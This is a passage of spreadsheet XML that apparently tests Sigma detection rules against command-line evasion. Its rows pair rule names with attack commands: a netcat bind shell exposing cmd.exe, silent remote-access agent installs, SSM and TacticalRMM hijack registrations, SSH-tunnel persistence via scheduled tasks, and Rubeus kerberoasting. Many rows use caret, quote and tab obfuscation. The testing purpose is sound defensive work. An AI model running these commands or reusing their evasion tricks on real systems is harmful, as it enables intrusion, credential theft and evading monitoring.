          <t>C:\\Windows\\System32\\cmd.exe /c "ncat.exe -l -v -p 8080 -e cmd.exe"</t>
        </is>
      </c>
      <c r="F840" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G840" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H840" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I840" s="41" t="inlineStr">
        <is>
          <t>PUA - Netcat Suspicious Execution (e31033fc-33f0-4020-9a16-faf9b31cbf08); PUA - Netcat Suspicious Execution (e31033fc-33f0-4020-9a16-faf9b31cbf08)</t>
        </is>
      </c>
      <c r="J840" s="41" t="n"/>
      <c r="K840" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="841" ht="15.75" customHeight="1" s="42">
      <c r="A841" s="41" t="inlineStr">
        <is>
          <t>t1095</t>
        </is>
      </c>
      <c r="B841" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_netcat</t>
        </is>
      </c>
      <c r="C841" s="41" t="inlineStr">
        <is>
          <t>PUA - Netcat Suspicious Execution</t>
        </is>
      </c>
      <c r="D841" s="41" t="inlineStr">
        <is>
          <t>e31033fc-33f0-4020-9a16-faf9b31cbf08</t>
        </is>
      </c>
      <c r="E841" s="41" t="inlineStr">
        <is>
          <t>nc.exe -lvnp 8080</t>
        </is>
      </c>
      <c r="F841" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G841" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H841" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I841" s="41" t="n"/>
      <c r="J841" s="41" t="n"/>
      <c r="K841" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="842" ht="15.75" customHeight="1" s="42">
      <c r="A842" s="41" t="inlineStr">
        <is>
          <t>t1095</t>
        </is>
      </c>
      <c r="B842" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_netcat</t>
        </is>
      </c>
      <c r="C842" s="41" t="inlineStr">
        <is>
          <t>PUA - Netcat Suspicious Execution</t>
        </is>
      </c>
      <c r="D842" s="41" t="inlineStr">
        <is>
          <t>e31033fc-33f0-4020-9a16-faf9b31cbf08</t>
        </is>
      </c>
      <c r="E842" s="41" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\cmd.exe /c ncat.exe --lua-exec cmd.exe</t>
        </is>
      </c>
      <c r="F842" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G842" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H842" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I842" s="41" t="inlineStr">
        <is>
          <t>PUA - Netcat Suspicious Execution (e31033fc-33f0-4020-9a16-faf9b31cbf08); PUA - Netcat Suspicious Execution (e31033fc-33f0-4020-9a16-faf9b31cbf08)</t>
        </is>
      </c>
      <c r="J842" s="41" t="n"/>
      <c r="K842" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="843" ht="15.75" customHeight="1" s="42">
      <c r="A843" s="41" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B843" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_anydesk_silent_install</t>
        </is>
      </c>
      <c r="C843" s="41" t="inlineStr">
        <is>
          <t>Remote Access Tool - AnyDesk Silent Installation</t>
        </is>
      </c>
      <c r="D843" s="41" t="inlineStr">
        <is>
          <t>114e7f1c-f137-48c8-8f54-3088c24ce4b9</t>
        </is>
      </c>
      <c r="E843" s="41" t="inlineStr">
        <is>
          <t>AnyDesk.exe "--install" "--start-with-win" "--silent"</t>
        </is>
      </c>
      <c r="F843" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G843" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H843" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I843" s="41" t="n"/>
      <c r="J843" s="41" t="n"/>
      <c r="K843" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="844" ht="15.75" customHeight="1" s="42">
      <c r="A844" s="41" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B844" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_anydesk_silent_install</t>
        </is>
      </c>
      <c r="C844" s="41" t="inlineStr">
        <is>
          <t>Remote Access Tool - AnyDesk Silent Installation</t>
        </is>
      </c>
      <c r="D844" s="41" t="inlineStr">
        <is>
          <t>114e7f1c-f137-48c8-8f54-3088c24ce4b9</t>
        </is>
      </c>
      <c r="E844" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c "AnyDesk.exe --ins^tall --start-with-w^in --si^lent"</t>
        </is>
      </c>
      <c r="F844" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G844" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H844" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I844" s="41" t="n"/>
      <c r="J844" s="41" t="n"/>
      <c r="K844" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="845" ht="15.75" customHeight="1" s="42">
      <c r="A845" s="41" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B845" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_meshagent_arguments</t>
        </is>
      </c>
      <c r="C845" s="41" t="inlineStr">
        <is>
          <t>Remote Access Tool - Potential MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D845" s="41" t="inlineStr">
        <is>
          <t>2fbbe9ff-0afc-470b-bdc0-592198339968</t>
        </is>
      </c>
      <c r="E845" s="41" t="inlineStr">
        <is>
          <t>MeshAgent.exe "--meshServiceName" "MeshAgentService"</t>
        </is>
      </c>
      <c r="F845" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G845" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H845" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I845" s="41" t="n"/>
      <c r="J845" s="41" t="n"/>
      <c r="K845" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="846" ht="15.75" customHeight="1" s="42">
      <c r="A846" s="41" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B846" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_meshagent_arguments</t>
        </is>
      </c>
      <c r="C846" s="41" t="inlineStr">
        <is>
          <t>Remote Access Tool - Potential MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D846" s="41" t="inlineStr">
        <is>
          <t>2fbbe9ff-0afc-470b-bdc0-592198339968</t>
        </is>
      </c>
      <c r="E846" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c "MeshAgent.exe --meshServ^iceName MeshAgentService"</t>
        </is>
      </c>
      <c r="F846" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G846" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H846" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I846" s="41" t="n"/>
      <c r="J846" s="41" t="n"/>
      <c r="K846" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="847" ht="15.75" customHeight="1" s="42">
      <c r="A847" s="41" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B847" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_ssm_agent_abuse</t>
        </is>
      </c>
      <c r="C847" s="41" t="inlineStr">
        <is>
          <t>Potential Amazon SSM Agent Hijacking</t>
        </is>
      </c>
      <c r="D847" s="41" t="inlineStr">
        <is>
          <t>d20ee2f4-822c-4827-9e15-41500b1fff10</t>
        </is>
      </c>
      <c r="E847" s="41" t="inlineStr">
        <is>
          <t>amazon-ssm-agent.exe "-register" "-code" "activation-code" "-id" "activation-id" "-region" "us-east-1"</t>
        </is>
      </c>
      <c r="F847" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G847" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H847" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I847" s="41" t="n"/>
      <c r="J847" s="41" t="n"/>
      <c r="K847" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="848" ht="15.75" customHeight="1" s="42">
      <c r="A848" s="41" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B848" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_ssm_agent_abuse</t>
        </is>
      </c>
      <c r="C848" s="41" t="inlineStr">
        <is>
          <t>Potential Amazon SSM Agent Hijacking</t>
        </is>
      </c>
      <c r="D848" s="41" t="inlineStr">
        <is>
          <t>d20ee2f4-822c-4827-9e15-41500b1fff10</t>
        </is>
      </c>
      <c r="E848" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c amazon-ssm-agent.exe -reg^ister -c^ode "activation-code" -^id "activation-id" -reg^ion "us-east-1"</t>
        </is>
      </c>
      <c r="F848" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G848" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H848" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I848" s="41" t="n"/>
      <c r="J848" s="41" t="n"/>
      <c r="K848" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="849" ht="15.75" customHeight="1" s="42">
      <c r="A849" s="41" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B849" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_ssm_agent_abuse</t>
        </is>
      </c>
      <c r="C849" s="41" t="inlineStr">
        <is>
          <t>Potential Amazon SSM Agent Hijacking</t>
        </is>
      </c>
      <c r="D849" s="41" t="inlineStr">
        <is>
          <t>d20ee2f4-822c-4827-9e15-41500b1fff10</t>
        </is>
      </c>
      <c r="E849" s="41" t="inlineStr">
        <is>
          <t>amazon-ssm-agent.exe -register	-code	"activation-code"	-id	"activation-id"	-region	"us-east-1"</t>
        </is>
      </c>
      <c r="F849" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G849" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H849" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I849" s="41" t="n"/>
      <c r="J849" s="41" t="n"/>
      <c r="K849" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="850" ht="15.75" customHeight="1" s="42">
      <c r="A850" s="41" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B850" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_ssm_agent_abuse</t>
        </is>
      </c>
      <c r="C850" s="41" t="inlineStr">
        <is>
          <t>Potential Amazon SSM Agent Hijacking</t>
        </is>
      </c>
      <c r="D850" s="41" t="inlineStr">
        <is>
          <t>d20ee2f4-822c-4827-9e15-41500b1fff10</t>
        </is>
      </c>
      <c r="E850" s="41" t="inlineStr">
        <is>
          <t>amazon-ssm-agent.exe -reg""ister -co""de "activation-code" -i""d "activation-id" -reg""ion "us-east-1"</t>
        </is>
      </c>
      <c r="F850" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G850" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H850" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I850" s="41" t="n"/>
      <c r="J850" s="41" t="n"/>
      <c r="K850" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="851" ht="15.75" customHeight="1" s="42">
      <c r="A851" s="41" t="inlineStr">
        <is>
          <t>t1219</t>
        </is>
      </c>
      <c r="B851" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_tacticalrmm_agent_registration_via_cli</t>
        </is>
      </c>
      <c r="C851" s="41" t="inlineStr">
        <is>
          <t>Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server</t>
        </is>
      </c>
      <c r="D851" s="41" t="inlineStr">
        <is>
          <t>2db93a3f-3249-4f73-9e68-0e77a0f8ae7e</t>
        </is>
      </c>
      <c r="E851" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\TacticalAgent\tacticalrmm.exe --ap^i [https://api.example.com](https://www.google.com/search?q=https://api.example.com) --au^th secret123 --client-^id 1 --site-^id 1 --agent-t^ype server"</t>
        </is>
      </c>
      <c r="F851" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G851" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H851" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I851" s="41" t="n"/>
      <c r="J851" s="41" t="n"/>
      <c r="K851" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="852" ht="15.75" customHeight="1" s="42">
      <c r="A852" s="41" t="inlineStr">
        <is>
          <t>t1219</t>
        </is>
      </c>
      <c r="B852" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_tacticalrmm_agent_registration_via_cli</t>
        </is>
      </c>
      <c r="C852" s="41" t="inlineStr">
        <is>
          <t>Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server</t>
        </is>
      </c>
      <c r="D852" s="41" t="inlineStr">
        <is>
          <t>2db93a3f-3249-4f73-9e68-0e77a0f8ae7e</t>
        </is>
      </c>
      <c r="E852" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c "set "P1=--api" &amp;&amp; set "P2=--auth" &amp;&amp; set "P3=--client-id" &amp;&amp; C:\TacticalAgent\tacticalrmm.exe %P1% [https://api.example.com](https://www.google.com/search?q=https://api.example.com) %P2% secret123 %P3% 1 --site-id 1 --agent-type server"</t>
        </is>
      </c>
      <c r="F852" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G852" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H852" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I852" s="41" t="n"/>
      <c r="J852" s="41" t="n"/>
      <c r="K852" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="853" ht="15.75" customHeight="1" s="42">
      <c r="A853" s="41" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B853" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_openssh_tunnelling</t>
        </is>
      </c>
      <c r="C853" s="41" t="inlineStr">
        <is>
          <t>Potential SSH Tunnel Persistence Install Using A Scheduled Task</t>
        </is>
      </c>
      <c r="D853" s="41" t="inlineStr">
        <is>
          <t>2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f</t>
        </is>
      </c>
      <c r="E853" s="41" t="inlineStr">
        <is>
          <t>schtasks.exe -create /tn "TestTask1" /tr "C:\Windows\System32\OpenSSH\ssh.exe -i C:\Temp\test.txt user@192.0.2.10" /sc daily</t>
        </is>
      </c>
      <c r="F853" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G853" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H853" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I853" s="41" t="n"/>
      <c r="J853" s="41" t="n"/>
      <c r="K853" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="854" ht="15.75" customHeight="1" s="42">
      <c r="A854" s="41" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B854" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_openssh_tunnelling</t>
        </is>
      </c>
      <c r="C854" s="41" t="inlineStr">
        <is>
          <t>Potential SSH Tunnel Persistence Install Using A Scheduled Task</t>
        </is>
      </c>
      <c r="D854" s="41" t="inlineStr">
        <is>
          <t>2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f</t>
        </is>
      </c>
      <c r="E854" s="41" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "TestTask1" /tr "C:\Windows\System32\OpenSSH\ssh -i C:\Temp\test.txt user@192.0.2.10" /sc daily</t>
        </is>
      </c>
      <c r="F854" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G854" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H854" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I854" s="41" t="n"/>
      <c r="J854" s="41" t="n"/>
      <c r="K854" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="855" ht="15.75" customHeight="1" s="42">
      <c r="A855" s="41" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B855" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_openssh_tunnelling</t>
        </is>
      </c>
      <c r="C855" s="41" t="inlineStr">
        <is>
          <t>Potential SSH Tunnel Persistence Install Using A Scheduled Task</t>
        </is>
      </c>
      <c r="D855" s="41" t="inlineStr">
        <is>
          <t>2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f</t>
        </is>
      </c>
      <c r="E855" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c schtasks.exe /cr^eate /tn "TestTask1" /tr "C:\Windows\System32\OpenSSH\ssh.exe -i C:\Temp\test.txt user@192.0.2.10" /sc daily</t>
        </is>
      </c>
      <c r="F855" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G855" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H855" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I855" s="41" t="inlineStr">
        <is>
          <t>Potential SSH Tunnel Persistence Install Using A Scheduled Task (2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J855" s="41" t="n"/>
      <c r="K855" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="856" ht="15.75" customHeight="1" s="42">
      <c r="A856" s="41" t="inlineStr">
        <is>
          <t>t1071.001</t>
        </is>
      </c>
      <c r="B856" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_vscode_tunnel_execution</t>
        </is>
      </c>
      <c r="C856" s="41" t="inlineStr">
        <is>
          <t>Visual Studio Code Tunnel Execution</t>
        </is>
      </c>
      <c r="D856" s="41" t="inlineStr">
        <is>
          <t>90d6bd71-dffb-4989-8d86-a827fedd6624</t>
        </is>
      </c>
      <c r="E856" s="41" t="inlineStr">
        <is>
          <t>code.exe tunnel --accept-server-license-terms</t>
        </is>
      </c>
      <c r="F856" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G856" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H856" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I856" s="41" t="n"/>
      <c r="J856" s="41" t="n"/>
      <c r="K856" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="857" ht="15.75" customHeight="1" s="42">
      <c r="A857" s="41" t="inlineStr">
        <is>
          <t>t1071.001</t>
        </is>
      </c>
      <c r="B857" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_vscode_tunnel_execution</t>
        </is>
      </c>
      <c r="C857" s="41" t="inlineStr">
        <is>
          <t>Visual Studio Code Tunnel Execution</t>
        </is>
      </c>
      <c r="D857" s="41" t="inlineStr">
        <is>
          <t>90d6bd71-dffb-4989-8d86-a827fedd6624</t>
        </is>
      </c>
      <c r="E857" s="41" t="inlineStr">
        <is>
          <t>code.exe tunnel --accept-server-license-terms=true</t>
        </is>
      </c>
      <c r="F857" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G857" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H857" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I857" s="41" t="n"/>
      <c r="J857" s="41" t="n"/>
      <c r="K857" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="858" ht="15.75" customHeight="1" s="42">
      <c r="A858" s="41" t="inlineStr">
        <is>
          <t>t1071.001</t>
        </is>
      </c>
      <c r="B858" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_vscode_tunnel_execution</t>
        </is>
      </c>
      <c r="C858" s="41" t="inlineStr">
        <is>
          <t>Visual Studio Code Tunnel Execution</t>
        </is>
      </c>
      <c r="D858" s="41" t="inlineStr">
        <is>
          <t>90d6bd71-dffb-4989-8d86-a827fedd6624</t>
        </is>
      </c>
      <c r="E858" s="41" t="inlineStr">
        <is>
          <t>code.exe --accept-server-license-terms tunnel</t>
        </is>
      </c>
      <c r="F858" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G858" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H858" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I858" s="41" t="n"/>
      <c r="J858" s="41" t="n"/>
      <c r="K858" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="859" ht="15.75" customHeight="1" s="42">
      <c r="A859" s="41" t="inlineStr">
        <is>
          <t>t1071.001</t>
        </is>
      </c>
      <c r="B859" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_vscode_tunnel_execution</t>
        </is>
      </c>
      <c r="C859" s="41" t="inlineStr">
        <is>
          <t>Visual Studio Code Tunnel Execution</t>
        </is>
      </c>
      <c r="D859" s="41" t="inlineStr">
        <is>
          <t>90d6bd71-dffb-4989-8d86-a827fedd6624</t>
        </is>
      </c>
      <c r="E859" s="41" t="inlineStr">
        <is>
          <t>code tunnel --accept-server-license-terms</t>
        </is>
      </c>
      <c r="F859" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G859" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H859" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I859" s="41" t="inlineStr">
        <is>
          <t>Suspicious High IntegrityLevel Conhost Legacy Option (3037d961-21e9-4732-b27a-637bcc7bf539)</t>
        </is>
      </c>
      <c r="J859" s="41" t="n"/>
      <c r="K859" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="860" ht="15.75" customHeight="1" s="42">
      <c r="A860" s="41" t="inlineStr">
        <is>
          <t>t1071.001</t>
        </is>
      </c>
      <c r="B860" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_vscode_tunnel_remote_shell_</t>
        </is>
      </c>
      <c r="C860" s="41" t="inlineStr">
        <is>
          <t>Visual Studio Code Tunnel Shell Execution</t>
        </is>
      </c>
      <c r="D860" s="41" t="inlineStr">
        <is>
          <t>f4a623c2-4ef5-4c33-b811-0642f702c9f1</t>
        </is>
      </c>
      <c r="E860" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -File "C:\Program Files\Microsoft VS Code\resources\app\out\vs\workbench\contrib\terminal\browser\media\..\media\shellIntegration.ps1"</t>
        </is>
      </c>
      <c r="F860" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G860" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H860" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I860" s="41" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J860" s="41" t="n"/>
      <c r="K860" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="861" ht="15.75" customHeight="1" s="42">
      <c r="A861" s="41" t="inlineStr">
        <is>
          <t>t1071.001</t>
        </is>
      </c>
      <c r="B861" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_vscode_tunnel_remote_shell_</t>
        </is>
      </c>
      <c r="C861" s="41" t="inlineStr">
        <is>
          <t>Visual Studio Code Tunnel Shell Execution</t>
        </is>
      </c>
      <c r="D861" s="41" t="inlineStr">
        <is>
          <t>f4a623c2-4ef5-4c33-b811-0642f702c9f1</t>
        </is>
      </c>
      <c r="E861" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -File "C:/Program Files/Microsoft VS Code/resources/app/out/vs/workbench/contrib/terminal/browser/media/shellIntegration.ps1"</t>
        </is>
      </c>
      <c r="F861" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G861" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H861" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I861" s="41" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J861" s="41" t="n"/>
      <c r="K861" s="41" t="b">
        <v>0</v>
      </c>
    </row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  <row r="1001" ht="15.75" customHeight="1" s="42"/>
    <row r="1002" ht="15.75" customHeight="1" s="42"/>
    <row r="1003" ht="15.75" customHeight="1" s="42"/>
    <row r="1004" ht="15.75" customHeight="1" s="42"/>
    <row r="1005" ht="15.75" customHeight="1" s="42"/>
    <row r="1006" ht="15.75" customHeight="1" s="42"/>
    <row r="1007" ht="15.75" customHeight="1" s="42"/>
    <row r="1008" ht="15.75" customHeight="1" s="42"/>
    <row r="1009" ht="15.75" customHeight="1" s="42"/>
    <row r="1010" ht="15.75" customHeight="1" s="42"/>
    <row r="1011" ht="15.75" customHeight="1" s="42"/>
    <row r="1012" ht="15.75" customHeight="1" s="42"/>
    <row r="1013" ht="15.75" customHeight="1" s="42"/>
    <row r="1014" ht="15.75" customHeight="1" s="42"/>
    <row r="1015" ht="15.75" customHeight="1" s="42"/>
    <row r="1016" ht="15.75" customHeight="1" s="42"/>
    <row r="1017" ht="15.75" customHeight="1" s="42"/>
    <row r="1018" ht="15.75" customHeight="1" s="42"/>
    <row r="1019" ht="15.75" customHeight="1" s="42"/>
    <row r="1020" ht="15.75" customHeight="1" s="42"/>
  </sheetData>
  <autoFilter ref="A1:K861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95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42" min="1" max="1"/>
    <col width="34" customWidth="1" style="42" min="2" max="2"/>
    <col width="36" customWidth="1" style="42" min="3" max="3"/>
    <col width="38.14" customWidth="1" style="42" min="4" max="4"/>
    <col width="43" customWidth="1" style="42" min="5" max="5"/>
    <col width="18" customWidth="1" style="42" min="6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3" t="n"/>
      <c r="B2" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C2" s="44" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D2" s="44" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E2" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\temp\updater.exe k^erberoast /outfile:hashes.txt"</t>
        </is>
      </c>
      <c r="F2" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G2" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2" s="43" t="n"/>
      <c r="J2" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3" ht="22.5" customHeight="1" s="42">
      <c r="A3" s="43" t="n"/>
      <c r="B3" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C3" s="44" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D3" s="44" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E3" s="44" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -Encoding Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F3" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3" s="43" t="n"/>
      <c r="J3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4" ht="22.5" customHeight="1" s="42">
      <c r="A4" s="43" t="n"/>
      <c r="B4" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C4" s="44" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D4" s="44" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E4" s="44" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -"Encoding" Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F4" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4" s="43" t="n"/>
      <c r="J4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K4" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="5" ht="22.5" customHeight="1" s="42">
      <c r="A5" s="43" t="n"/>
      <c r="B5" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C5" s="44" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D5" s="44" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E5" s="44" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -EncodinG Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F5" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G5" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H5" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I5" s="43" t="n"/>
      <c r="J5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K5" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="6" ht="22.5" customHeight="1" s="42">
      <c r="A6" s="43" t="n"/>
